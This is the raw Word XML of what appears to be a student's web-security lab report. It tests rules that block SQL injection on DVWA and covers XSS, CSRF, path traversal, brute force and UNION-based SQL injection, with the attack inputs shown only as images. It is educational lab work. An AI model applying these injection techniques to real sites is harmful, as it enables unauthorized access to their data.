          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/apache2/sites-available/000-default.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76789E5F" w14:textId="32ECD00C" w:rsidR="009634F7" w:rsidRDefault="00DD7EE9" w:rsidP="009634F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="021FE170" wp14:editId="6F3E52D9">
            <wp:extent cx="5725160" cy="1837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1837055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F621E5" w14:textId="1A7F1740" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18ABA98D" w14:textId="137DDA4E" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now everything is set up. I should restart the server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2CA279" w14:textId="70472066" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD7EE9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD7EE9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD7EE9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD7EE9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD7EE9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B2E788" w14:textId="36470A90" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">And go to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check whether the rules are working or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6D1459" w14:textId="29C74435" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C6D4C33" wp14:editId="291A480D">
            <wp:extent cx="5725160" cy="178879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C907FB1" w14:textId="4700D4A3" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This line of code would return everything in the database. However, we just applied rules that prevent these tricks from happening. Therefore, let me try to run this command to see what would happen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EA455D" w14:textId="4AFAAA54" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79CE4715" wp14:editId="2E99F00E">
            <wp:extent cx="5732780" cy="15347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0D652DB6" w14:textId="4DF5B8F7" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, the rules are working properly and prevented </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection statement from running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C5BE7C" w14:textId="443C1BA6" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let me try another trick which is adding parameters at the end of the url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD7F41" w14:textId="45AA49C7" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E4C0B38" wp14:editId="5D4AD14F">
            <wp:extent cx="571690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1558290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CCE6A23" wp14:editId="3B863549">
            <wp:extent cx="5725160" cy="21069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14:paraId="30DD315C" w14:textId="30BB56A3" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF7783E" w14:textId="68BA203E" w:rsidR="00DD7EE9" w:rsidRDefault="00DD7EE9" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This trick also is being stopped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4773D7D8" w14:textId="422C53D5" w:rsidR="005F0A5C" w:rsidRDefault="005F0A5C" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3998EE77" w14:textId="3B012E23" w:rsidR="005F0A5C" w:rsidRDefault="005F0A5C" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3753C590" w14:textId="23CEFEC7" w:rsidR="005F0A5C" w:rsidRDefault="005F0A5C" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5710ED7C" w14:textId="3F739C0B" w:rsidR="005F0A5C" w:rsidRDefault="005F0A5C" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51361E59" w14:textId="77777777" w:rsidR="005F0A5C" w:rsidRPr="00DD7EE9" w:rsidRDefault="005F0A5C" w:rsidP="00DD7EE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DE5704" w14:textId="75144297" w:rsidR="005F0A5C" w:rsidRDefault="005F0A5C" w:rsidP="005F0A5C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc114777181"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lesson 4.1 (XSS &amp; CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="254BA21A" w14:textId="62EB7668" w:rsidR="005F0A5C" w:rsidRDefault="005124E2" w:rsidP="005F0A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting is a vulnerability that mostly targets the web applications. It happens because the attacker has a malicious code, then they can inject that code in some web application code, causing unusual behavior for the website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2A6D63" w14:textId="6A3EE2A6" w:rsidR="001549F8" w:rsidRDefault="001549F8" w:rsidP="005F0A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0989E7A1" w14:textId="66C1F52A" w:rsidR="001549F8" w:rsidRDefault="001549F8" w:rsidP="005F0A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001549F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cross‐site request forgery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a vulnerability that allows the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="007531C6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">force the user do things </w:t>
      </w:r>
      <w:r w:rsidR="007531C6" w:rsidRPr="007531C6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unconsciously</w:t>
      </w:r>
      <w:r w:rsidR="007531C6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with bad impact on the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E73828" w14:textId="76621F95" w:rsidR="007531C6" w:rsidRDefault="007531C6" w:rsidP="005F0A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D629B27" w14:textId="05826EB5" w:rsidR="007531C6" w:rsidRDefault="007531C6" w:rsidP="005F0A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I will do some exercises for both vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DDDB22" w14:textId="152CAF33" w:rsidR="00F42E4A" w:rsidRDefault="00F42E4A" w:rsidP="005F0A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E49F724" w14:textId="462076E3" w:rsidR="00F42E4A" w:rsidRPr="005F0A5C" w:rsidRDefault="00F42E4A" w:rsidP="005F0A5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12A2DB4B" wp14:editId="65F2D34D">
            <wp:extent cx="4492625" cy="376872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2625" cy="3768725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CE719B6" wp14:editId="4DA821AB">
            <wp:extent cx="524002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1955800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8ED760" w14:textId="3D5BBB6B" w:rsidR="002512B5" w:rsidRDefault="002512B5" w:rsidP="00F42E4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B039A1" w14:textId="77777777" w:rsidR="00DB007A" w:rsidRDefault="00DB007A" w:rsidP="00ED750D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038EE145" w14:textId="33C35545" w:rsidR="00DB007A" w:rsidRDefault="00ED750D" w:rsidP="00ED750D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next level, the previous one did not work. Therefore, I inspected the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> code and noticed that my input was put inside a tag so first I need to close the tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB0F81" w14:textId="4590E7C4" w:rsidR="00B0687C" w:rsidRDefault="00B0687C" w:rsidP="00ED750D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3417594C" wp14:editId="3DCAEDAC">
            <wp:extent cx="5041265" cy="323596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3235960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63181B80" w14:textId="2EE3DA6A" w:rsidR="0055541D" w:rsidRPr="0055541D" w:rsidRDefault="0055541D" w:rsidP="0055541D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763ED0F9" w14:textId="62E3D0B3" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0055541D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3EF88D" w14:textId="66C1D032" w:rsidR="0055541D" w:rsidRPr="0055541D" w:rsidRDefault="0055541D" w:rsidP="0055541D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B35C5B1" wp14:editId="02072277">
            <wp:extent cx="5725160" cy="2687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687320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3F8B45" w14:textId="3ADEB4D6" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="007C322B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE830B2" w14:textId="77777777" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="007C322B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62705E41" w14:textId="77777777" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="007C322B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA70734" w14:textId="5E42BE72" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="007C322B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4190F63A" w14:textId="7142EE9A" w:rsidR="00E67820" w:rsidRDefault="00E67820" w:rsidP="00E67820">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC87A7D" w14:textId="77777777" w:rsidR="00E67820" w:rsidRPr="00E67820" w:rsidRDefault="00E67820" w:rsidP="00E67820">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560F9B61" w14:textId="0414C3C5" w:rsidR="007C322B" w:rsidRPr="00A73FE2" w:rsidRDefault="007C322B" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc114777182"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="452A4F7C" w14:textId="77777777" w:rsidR="007C322B" w:rsidRPr="00A73FE2" w:rsidRDefault="007C322B" w:rsidP="007C322B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744FF039" w14:textId="7F628FE6" w:rsidR="0095033A" w:rsidRPr="00A73FE2" w:rsidRDefault="00C64063" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc114777183"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Path Traversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67820">
        <w:t>(2.1)</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5325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc114777184"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Brute Force</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>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Let’s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6D1414F3" w:rsidR="00CE19DB" w:rsidRPr="00A73FE2" w:rsidRDefault="00CE19DB" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc114777185"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Brute Force – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>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D48392B" w:rsidR="00D7708B" w:rsidRPr="00A73FE2" w:rsidRDefault="00D7708B" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc114777186"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidR="00E67820">
        <w:t xml:space="preserve"> (3.1)</w:t>
      </w:r>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5325E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc114777187"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>SQLi – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>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5325E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc114777188"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:lastRenderedPageBreak/>
        <w:t>SQLi – Medium level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>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21311A43" w:rsidR="00C87697"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r w:rsidR="0068665A" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>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73C94A1D" w14:textId="0C2D2935" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9294AB" w14:textId="015E49BA" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193F23BD" w14:textId="716ECB45" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc114777189"/>
      <w:r>
        <w:t>SQLi – Online Challenges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="4279185E" w14:textId="3D291EA4" w:rsidR="0068665A" w:rsidRPr="0068665A" w:rsidRDefault="0068665A" w:rsidP="0068665A"/>
    <w:p w14:paraId="331B6F8E" w14:textId="32D7B23B" w:rsidR="00C87697" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We can easily retrieve data from the database by just entering an expected number to the database. We can retrieve more data using the key word UNION. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD459F" w14:textId="5258DB0B" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How UNION works?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D82312" w14:textId="5DAA4020" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Union lets you trick the database by entering a number as expected, then after the number you type UNION to tell the database that you are not finished, and you demand more data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC846C6" w14:textId="35D1235B" w:rsidR="0068665A" w:rsidRDefault="0068665A"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16232" wp14:editId="672F0948">
            <wp:extent cx="5725160" cy="19558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346310D" w14:textId="51CA8DE1" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="0068665A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
